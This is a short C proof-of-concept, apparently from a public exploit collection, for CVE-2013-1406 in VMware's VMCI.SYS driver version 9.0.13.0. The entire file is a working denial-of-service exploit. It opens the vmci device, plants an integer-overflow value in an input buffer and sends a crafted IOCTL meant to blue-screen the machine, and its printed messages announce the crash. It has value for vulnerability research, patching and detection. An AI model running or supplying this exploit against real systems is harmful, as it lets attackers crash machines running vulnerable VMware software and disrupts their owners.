/*
This PoC only for version 
VMCI.SYS 9.0.13.0
*/

#include "stdafx.h"
#include "windows.h"

#define count_massive 0x189			
#define ioctl_vmsock  0x8103208C
#define integer_overflow_size 0x12492492;


int _tmain(int argc, _TCHAR* argv[])
{
	HANDLE vmci_device;
	DWORD bytesRet;
	int inbuf [count_massive];
	int outbuf[count_massive];
	int size_=count_massive*sizeof(int);
	
	printf("**************************************************\r\n");
	printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
	printf("**************************************************\r\n");
	//opening vmci interface device
	vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
	if (vmci_device!=INVALID_HANDLE_VALUE)
	{
		printf("[+]vmci device opened \r\n");
		//prepare input buffer
		memset(&inbuf,0,size_);
		//vulnerable to integer overflowing parameter
		inbuf[4]=integer_overflow_size; 
		printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
		//Delaying signed with Diablo stamp :D
		Sleep(0x29a);
		Sleep(0x1000);
		DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL);
		CloseHandle(vmci_device);
	}
	else
	{
		printf("[-]Error: Can't open vmci device!\r\n");
	}
	return 0;
}